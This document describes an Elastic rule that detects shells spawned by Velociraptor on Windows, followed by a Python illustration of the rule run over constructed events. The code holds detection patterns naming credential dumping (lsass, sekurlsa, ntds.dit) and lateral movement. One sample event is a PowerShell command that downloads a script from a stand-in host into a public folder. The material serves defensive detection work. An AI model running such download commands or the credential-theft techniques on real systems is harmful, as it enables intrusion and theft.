Suspicious Shell Execution via Velociraptor

Elastic Detection Rules

Summary
Detects suspicious shell executions on Windows endpoints where Velociraptor (velociraptor.exe) acts as the parent process and spawns a child process from the set {cmd.exe, powershell.exe, rundll32.exe}. The rule flags scenarios where Velociraptor is used to execute shell commands, which threat actors have been observed using for post-compromise activity, including command execution, lateral movement, and credential access. To reduce noise, the rule excludes known Velociraptor artifact patterns and encoded/safe commands that are legitimate Velociraptor operations (e.g., certain Get-LocalGroupMember or registry queries, and specific obfuscated payloads). The detection maps to MITRE ATT&CK T1219 (Remote Access Tools) with the sub-technique T1219.002 (Remote Desktop Software) as a representative technique for remote shell or RAT-style activity.

The query inspects Windows process start events where the parent is Velociraptor and the child is one of the shell executables, while filtering out benign Velociraptor commands and known-good artifacts. It uses data from multiple EDR/SIEM sources to corroborate events (e.g., Sysmon process events, Windows Security Event Logs, and endpoint telemetry).

Investigation focus includes confirming the Velociraptor installation path and code signature, examining the child process command line for suspicious activity (e.g., download, lateral movement, credential queries), and correlating with other alerts (initial access, persistence, C2). False positives may occur with legitimate Velociraptor usage; consider allowlisting by command-line pattern or host if IR/DFIR activity is authorized.

Response steps include isolating the host, terminating Velociraptor and the spawned shell process, removing Velociraptor deployments, and rotating credentials. If deployment is authorized, tune the rule or add approved exceptions to reduce noise.
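The parent/child matching, the benign-command exclusions and the triage enrichment described above, run over a handful of constructed process-start events. This is an added illustration, not Elastic's rule or its query; the exclusion regexes, the expected install directory and the indicator keyword lists are assumptions standing in for the rule's real exclusion list, which the summary does not reproduce.

```python
import ntpath
import re
from dataclasses import dataclass

# Parent/child pairs the rule looks for (from the summary above).
PARENT_NAMES = {"velociraptor.exe"}
CHILD_NAMES = {"cmd.exe", "powershell.exe", "rundll32.exe"}

# Benign command-line exclusions. The summary says the rule excludes known
# Velociraptor artifact patterns such as certain Get-LocalGroupMember and
# registry queries; the exact patterns are not given, so these are assumed.
BENIGN_PATTERNS = [
    re.compile(r"\bGet-LocalGroupMember\b", re.IGNORECASE),
    re.compile(r"\breg(?:\.exe)?\s+query\b", re.IGNORECASE),
]

# Assumed expected install directory, used only for triage context
# (the summary recommends confirming the installation path).
EXPECTED_PARENT_DIR = r"c:\program files\velociraptor"

# Command-line indicators for the investigation focus named in the summary
# (download, lateral movement, credential access). Keyword lists are assumed.
INDICATORS = {
    "download": re.compile(
        r"invoke-webrequest|downloadstring|downloadfile|certutil.*-urlcache", re.I),
    "lateral_movement": re.compile(
        r"\bwmic\b.*/node|psexec|\\\\[^\s\\]+\\(?:admin|c)\$", re.I),
    "credential_access": re.compile(r"lsass|sekurlsa|ntds\.dit|\bsam\b", re.I),
}


@dataclass(frozen=True)
class ProcessStart:
    """Minimal process-creation event (e.g. Sysmon Event ID 1 fields)."""
    host: str
    parent_name: str
    parent_path: str
    child_name: str
    command_line: str


def matches_rule(ev: ProcessStart) -> bool:
    """Core query: Velociraptor parent, shell child, not an excluded command."""
    if ev.parent_name.lower() not in PARENT_NAMES:
        return False
    if ev.child_name.lower() not in CHILD_NAMES:
        return False
    return not any(p.search(ev.command_line) for p in BENIGN_PATTERNS)


def triage(ev: ProcessStart) -> dict:
    """Enrich a hit with the context an analyst would check first."""
    parent_dir = ntpath.dirname(ev.parent_path).lower()
    return {
        "host": ev.host,
        "child": ev.child_name.lower(),
        "parent_in_expected_dir": parent_dir == EXPECTED_PARENT_DIR,
        "indicators": sorted(
            name for name, rx in INDICATORS.items() if rx.search(ev.command_line)),
    }


def run_rule(events) -> list:
    """Apply the rule to a batch of events and return triaged alerts."""
    return [triage(ev) for ev in events if matches_rule(ev)]


# Constructed sample telemetry: two benign Velociraptor artifact runs, two
# hits, and two events that fall outside the parent/child pairing.
VELO = r"C:\Program Files\Velociraptor\velociraptor.exe"
SAMPLE_EVENTS = [
    ProcessStart("WS-01", "velociraptor.exe", VELO, "powershell.exe",
                 "powershell.exe -NoProfile -Command Get-LocalGroupMember -Group Administrators"),
    ProcessStart("WS-01", "velociraptor.exe", VELO, "cmd.exe",
                 r"cmd.exe /c reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),
    ProcessStart("WS-02", "velociraptor.exe", r"C:\Users\Public\velociraptor.exe", "powershell.exe",
                 "powershell.exe -NoProfile -Command Invoke-WebRequest -Uri "
                 "http://example.invalid/update.ps1 -OutFile C:\\Users\\Public\\u.ps1"),
    ProcessStart("WS-03", "velociraptor.exe", VELO, "rundll32.exe",
                 r"rundll32.exe C:\Users\Public\helper.dll,Start"),
    ProcessStart("WS-04", "explorer.exe", r"C:\Windows\explorer.exe", "cmd.exe",
                 "cmd.exe /c whoami"),
    ProcessStart("WS-02", "velociraptor.exe", r"C:\Users\Public\velociraptor.exe", "notepad.exe",
                 "notepad.exe"),
]

if __name__ == "__main__":
    for alert in run_rule(SAMPLE_EVENTS):
        print(alert)
```

On the sample batch the two artifact-style commands are suppressed by the exclusions, the explorer.exe and notepad.exe events never enter the parent/child match, and the remaining two events become alerts: the WS-02 PowerShell launch is tagged with a download indicator and an unexpected parent path, while the WS-03 rundll32.exe launch is a hit with no keyword indicator, which is exactly the kind of alert that needs the installation-path and signature check rather than an automatic dismissal.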
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
ATT&CK Techniques
  • T1219
  • T1219.002
Created: 2026-03-18